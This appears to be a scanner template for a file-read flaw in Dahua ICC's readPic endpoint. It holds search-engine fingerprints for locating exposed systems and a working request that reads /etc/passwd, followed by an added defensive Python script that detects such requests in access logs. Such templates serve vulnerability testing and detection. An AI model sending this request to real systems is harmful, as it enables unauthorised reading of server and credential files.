Vulnerability Description
File read in Dahua ICC through the readPic endpoint.
FOFA: body="*客户端会小于800*"
ZoomEye: *客户端会小于800*
id: dahua-icc-readpic-fileread

info:
  name: Dahua Icc Readpic File Read
  author: zan8in
  severity: high
  verified: true
  description: |-
    Read Dahua Icc file
    FOFA: body="*客户端会小于800*"
    ZoomEye: *客户端会小于800*
  tags: dahua,fileread
  created: 2023/11/01

rules:
  r0:
    request:
      method: GET
      path: /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd
    # Match only when the response is 200 and the body contains a passwd-style root entry
    expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()
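
An added example, not part of the original template or of the scanner it is written for: a defender-side check that scans web access logs for requests to the readPic endpoint whose fileUrl parameter uses the file: scheme, as the rule above sends. The combined log format, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoint taken from the template above.
READPIC_PATH = "/evo-apigw/evo-cirs/file/readpic"

# Request portion of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

def find_readpic_file_reads(lines):
    """Return (client_ip, status, fileUrl) for readPic requests using the file: scheme."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m["target"])
        # Decode and collapse duplicate slashes so path variants still compare equal.
        path = re.sub(r"/+", "/", unquote(parts.path)).lower()
        if path != READPIC_PATH:
            continue
        # parse_qs percent-decodes values, so an encoded "file%3A" is caught too.
        for value in parse_qs(parts.query).get("fileUrl", []):
            if value.strip().lower().startswith("file:"):
                hits.append((m["ip"], int(m["status"]), value))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Nov/2023:10:00:01 +0000] "GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [01/Nov/2023:10:00:02 +0000] "GET /evo-apigw//evo-cirs/file/readPic?fileUrl=FILE%3A/etc/passwd HTTP/1.1" 404 0',
    '203.0.113.20 - - [01/Nov/2023:10:05:00 +0000] "GET /evo-apigw/evo-cirs/file/readPic?fileUrl=http://10.0.0.5/snap/1.jpg HTTP/1.1" 200 52311',
    '203.0.113.20 - - [01/Nov/2023:10:05:09 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, status, file_url in find_readpic_file_reads(SAMPLE_LOG):
        print(f"{ip} status={status} fileUrl={file_url}")
```

A hit with status 200 corresponds to the condition the rule's expression checks for and is the one to triage first.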